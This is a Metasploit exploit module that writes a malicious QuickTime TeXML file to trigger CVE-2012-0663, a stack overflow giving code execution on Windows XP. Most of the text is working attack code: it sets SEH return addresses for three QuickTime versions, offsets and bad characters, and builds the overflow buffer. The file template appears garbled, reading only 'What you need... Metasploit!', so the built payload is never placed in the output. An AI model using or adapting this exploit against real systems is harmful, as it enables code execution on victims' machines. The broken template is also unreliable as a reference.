## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'Apple QuickTime TeXML Style Element Stack Buffer Overflow', 'Description' => %q{ This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow, and then gain arbitrary code execution under the context of the user. This is due to the QuickTime3GPP.gtx component not handling certain Style subfields properly, storing user-supplied data on the stack, which results the overflow. }, 'License' => MSF_LICENSE, 'Author' => [ 'Alexander Gavrun', # Vulnerability Discovery 'sinn3r', # Metasploit Module 'juan vazquez' # Metasploit Module ], 'References' => [ [ 'OSVDB', '81934' ], [ 'CVE', '2012-0663' ], [ 'BID', '53571' ], [ 'ZDI', '12-107' ], [ 'URL', 'http://0x1byte.blogspot.com/2012/06/cve-2012-0663-and-cve-2012-0664-samples.html' ], [ 'URL', 'http://support.apple.com/kb/HT1222' ] ], 'Payload' => { 'DisableNops' => true, 'BadChars' => "\x00\x23\x25\x3c\x3e\x7d" }, 'Platform' => 'win', 'Targets' => [ [ 'QuickTime 7.7.1 on Windows XP SP3', { 'Ret' => 0x66f1bdf8, # POP ESI/POP EDI/RET from QuickTime.qts (7.71.80.42) 'Offset' => 643, 'Max' => 13508 } ], [ 'QuickTime 7.7.0 on Windows XP SP3', { 'Ret' => 0x66F1BD66, # PPR from QuickTime.qts (7.70.80.34) 'Offset' => 643, 'Max' => 13508 } ], [ 'QuickTime 7.6.9 on Windows XP SP3', { 'Ret' => 0x66801042, # PPR from QuickTime.qts (7.69.80.9) 'Offset' => 643, 'Max' => 13508 } ], ], 'Privileged' => false, 'DisclosureDate' => 'May 15 2012')) register_options( [ OptString.new('FILENAME', [ true, 'The file name.', 'msf.xml']), ], self.class) end def exploit my_payload = rand_text(target['Offset']) my_payload << generate_seh_record(target.ret) my_payload << payload.encoded my_payload << rand_text(target['Max'] - my_payload.length) texml = <<-eos What you need... Metasploit! eos texml = texml.gsub(/^ {4}/,'') print_status("Creating '#{datastore['FILENAME']}'.") file_create(texml) end end